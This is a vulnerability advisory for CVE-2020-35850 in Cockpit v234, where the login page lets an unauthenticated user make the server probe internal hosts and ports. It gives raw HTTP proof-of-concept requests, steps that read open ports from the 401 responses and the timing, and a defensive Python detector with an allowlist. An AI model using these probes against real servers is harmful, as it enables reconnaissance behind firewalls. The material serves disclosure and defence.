Cockpit-Project v234 - Server-Side Request Vulnerability (unauthenticated) CVE-2020-35850

  • Cockpit version: 234
  • OS: Ubuntu 18.04
  • Page: login

An unauthenticated user can detect whether the SSH port, or any other port, is open on a server running the latest Cockpit version. The vulnerability allows a user to make Cockpit send requests to internal hosts in order to detect open ports, so the firewall configuration can be bypassed, or the server can be used as a gateway by a malicious user for port scanning. In addition, the user can induce the application to make a request back to the server that is hosting Cockpit itself. For example, if the system administrator creates an iptables rule to drop all packets arriving on port 22 (or any other port), the user can still determine whether port 22 is open.

Assume there is an iptables rule under which port 22 is open on 127.0.0.1 (the loopback interface) but closed on all other interfaces.

First HTTP Request:

```http
GET /cockpit+=192.168.1.27:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted
```

Second HTTP Request:

```http
GET /cockpit+=127.0.0.1:22/login HTTP/1.1
Host: 192.168.1.27:9090
User-Agent: *
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dWJ1bnR1OnVidW50dQ==
X-Authorize:
Connection: close
Cookie: cockpit=deleted
```

Steps to reproduce:

On the login panel:

  1. Click Other Options.
  2. Enter 127.0.0.1 in the Connect to field and send the request with incorrect credentials.
  3. Intercept the request with Burp Suite.
  4. If the ssh service is open on port 22 and the credentials are wrong, the server returns a "401 Authentication Failed" response.
  5. If the user tries to connect to a port that accepts data for an ssh connection, the server returns a "401 Authentication failed: no-host" response and waits 10 seconds.
  6. If the user tries to connect to a closed port, the server returns a "401 Authentication failed: no-host" response without waiting.
  7. If the ssh service is open on port 22 and the credentials are correct, the server returns a "200" response.
  8. Open ports on an internal server, or on the loopback interface of the target server, can be detected by changing the remote port number.
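
The behaviour described above leaves a clear trace: every probe is a request whose path starts with `cockpit+=host:port`, and a scanning client produces many such requests to distinct targets, all answered with 401. The following Python is an added defender's example written for this page; it is not code from the Cockpit project or from the advisory author. It parses the `cockpit+=host:port` path form shown in the requests above, classifies the target address (loopback, private, public, or a bare hostname), applies an allowlist policy that a reverse proxy or WAF in front of Cockpit could enforce (loopback is always refused), and runs a simple scan detector over a few constructed access-log lines in Combined Log Format. The log lines, client addresses, hostname `build01`, and the allowlist contents are all constructed for the example; the Combined Log Format assumption stands in for whatever logging the deployment's front-end proxy actually produces.

```python
import ipaddress
import re
from collections import defaultdict

# Matches the "cockpit+=host:port" path prefix seen in the requests above,
# e.g. "/cockpit+=127.0.0.1:22/login". The port is optional; bracketed IPv6
# literals are not handled by this simple pattern (assumption: IPv4 or names).
_TARGET_RE = re.compile(r"^/cockpit\+=(?P<host>[^/:]+)(?::(?P<port>\d{1,5}))?/")

# Combined Log Format line from a constructed front-end proxy log (assumption).
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_target(path):
    """Return (host, port) for a cockpit+= request path, else None.

    port is an int, or None when the path carries no explicit port."""
    m = _TARGET_RE.match(path)
    if not m:
        return None
    port = int(m.group("port")) if m.group("port") else None
    return m.group("host"), port


def classify_host(host):
    """Classify a target as 'loopback', 'private', 'public' or 'name'."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "name"  # not an IP literal; a hostname Cockpit would resolve
    if ip.is_loopback:
        return "loopback"
    if ip.is_private or ip.is_link_local:
        return "private"
    return "public"


def is_allowed_target(host, allowlist):
    """Mitigation policy for a proxy in front of Cockpit (assumption): only
    explicitly allowlisted hosts may be used as a 'Connect to' target, and the
    loopback address is refused even if someone puts it on the list."""
    if classify_host(host) == "loopback":
        return False
    return host in allowlist


# Constructed sample log (not from a real server). Client 10.0.0.5 probes
# several host:port targets and gets 401 for each; 10.0.0.9 is normal use.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /cockpit+=127.0.0.1:22/login HTTP/1.1" 401 23
10.0.0.5 - - [01/Jan/2021:10:00:02 +0000] "GET /cockpit+=127.0.0.1:80/login HTTP/1.1" 401 31
10.0.0.5 - - [01/Jan/2021:10:00:03 +0000] "GET /cockpit+=127.0.0.1:3306/login HTTP/1.1" 401 31
10.0.0.5 - - [01/Jan/2021:10:00:14 +0000] "GET /cockpit+=192.168.1.30:22/login HTTP/1.1" 401 31
10.0.0.5 - - [01/Jan/2021:10:00:15 +0000] "GET /cockpit+=192.168.1.30:443/login HTTP/1.1" 401 31
10.0.0.9 - - [01/Jan/2021:10:01:00 +0000] "GET /cockpit+=build01:22/login HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2021:10:02:00 +0000] "GET /cockpit/@localhost/system/index.html HTTP/1.1" 200 9001
"""


def find_scanners(log_text, min_targets=3):
    """Return {client: sorted [(host, port), ...]} for every client that asked
    Cockpit to reach at least min_targets distinct host:port targets and was
    refused (HTTP 401) each time. Legitimate users log in to one or two hosts;
    a port scan through the login page fans out across many targets."""
    targets = defaultdict(set)
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        target = parse_target(m.group("path"))
        if target is None or m.group("status") != "401":
            continue
        targets[m.group("client")].add(target)
    return {
        client: sorted(ts, key=lambda t: (t[0], t[1] or 0))
        for client, ts in targets.items()
        if len(ts) >= min_targets
    }


if __name__ == "__main__":
    for client, probed in find_scanners(SAMPLE_LOG).items():
        kinds = sorted({classify_host(h) for h, _ in probed})
        print(f"{client}: {len(probed)} refused targets, classes={kinds}")
        for host, port in probed:
            print(f"  {host}:{port}  allowed={is_allowed_target(host, {'build01'})}")
```

The detector keys on 401 because, as the steps above show, every probe against a wrong-credential or non-SSH target ends in a 401; the differing timing (10-second wait versus immediate response) is not visible in an access log, so the fan-out across distinct targets is the signal to alert on. The allowlist policy removes the oracle entirely for hosts the deployment never needs to reach, loopback included.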
